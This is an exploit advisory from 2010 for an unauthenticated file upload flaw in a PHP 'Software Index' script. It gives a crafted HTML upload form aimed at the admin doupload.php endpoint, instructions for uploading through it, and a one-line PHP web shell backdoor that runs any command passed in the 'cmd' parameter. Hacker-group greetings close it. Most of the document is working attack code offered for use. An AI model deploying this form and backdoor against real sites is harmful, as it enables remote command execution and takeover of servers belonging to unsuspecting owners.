######################################################################## # Vendor: http://www.p30vel.ir/# Date: 2010-05-27 # Author : indoushka # Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! # Contact : indoushka@hotmail.com # Home :# Bug: Up# Tested on : windows SP2 Français V.(Pnx2 2.0) ######################################################################## # Dork : Copyright 2010. Software Index # Exploit By indoushka <html><head><Title>Select Image File for uploading</Title><script language="JavaScript">
function checkFile(){if(form1.userfile.value ==""){
alert(" Please choose a file to upload");return(false);}if(form1.userfile.value.indexOf(".php")==-1&&form1.userfile.value.indexOf(".png")==-1&&form1.userfile.value.indexOf(".bmp")==-1&&form1.userfile.value.indexOf(".jpeg")==-1&& form1.userfile.value.indexOf(".gif")==-1){
alert(" Please upload .gif/.jpg/.jpeg/.bmp/.png files only");
form1.userfile.value="";
form1.userfile.focus();return(false);}return(true);}</script></head><body><b><font size="3">Upload Image</font>.</b><FORM ENCTYPE="multipart/form-data" ACTION="http://127.0.0.1/Software-Index-P30vel.ir/siteadmin/doupload.php?box=<?php echo $_REQUEST["box"]?>&func=2" METHOD=post ID=form1 NAME=form1 onSubmit="javscript:return checkFile(form1);"><inputtype="hidden" name="id" value="<?php echo $_SESSION[ "username" ] ?>"><inputtype="hidden" name="act" value="upload"><table><tr><td><b><font size="3" color="#FFFFFF"><u><font color="#000000" size="2">Attachment</font></u></font></b><table><tr><td valign="top" width="15"><font color="#000000">1.</font></td><td width="470"><font color="#000000">To add an Attachment, click
the 'Browse' button to select the file to attach,ortype the path
to the filein the Text-box below.</font></td></tr><tr><td valign="top" width="15"><font color="#000000">2.</font></td><td width="470"><font color="#000000">Then click Upload button to
complete the upload</font></td></tr><tr><td valign="top" width="15"><font color="#000000">3.</font></td><td width="470"><font color="#990000">NOTE</font><font color="#000000">:
The File transfer can take from a few seconds upto a few minutes
depending on the size of the attachment. Please be patient while
the attachment is being uploaded.</font></td></tr><tr><td valign="top" width="15"><font color="#000000">4.</font></td><td width="470"><font color="#990000">NOTE</font><font color="#000000">:
The File will be renamed if the filewith the same name is present</font></td></tr></table></TD></TR><TR><TD><STRONG>Hit the [Browse] button to find the file on your computer.</STRONG><BR></TD></TR><TR><TD><strong>Image</strong><INPUT NAME=userfile SIZE=30 TYPE=file MaxFileSize="1000000"><inputtype="hidden" name="MAX_FILE_SIZE" value="1000000"></TD></TR><TR><TD></TD></TR><TR><TD><inputtype="submit" value="Upload" name="uploadfile"></TD></TR><TR><TD>NOTE: Please be patient, you will not receive any notification until the
fileis completely transferred.<BR><BR></TD></TR></table></FORM><!--<Script Language="JavaScript">
function listattach(filename){
window.opener.document.form123.<?php //request.QueryString("box") ?>.value=filename
window.close()}</script><Input type=button value=Done onClick="listattach('<?php //echo filename ?>')">--></body></html>1- Save as php or html and upload to your localhost or server
2- use Backdoor
<?php
$cmd = $_GET['cmd'];
system($cmd);
?>3- you see where the file uploaded
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live )* RoAd_KiLlEr * AnGeL25dZ
---------------------------------------------------------------------------------------------------------------------------------
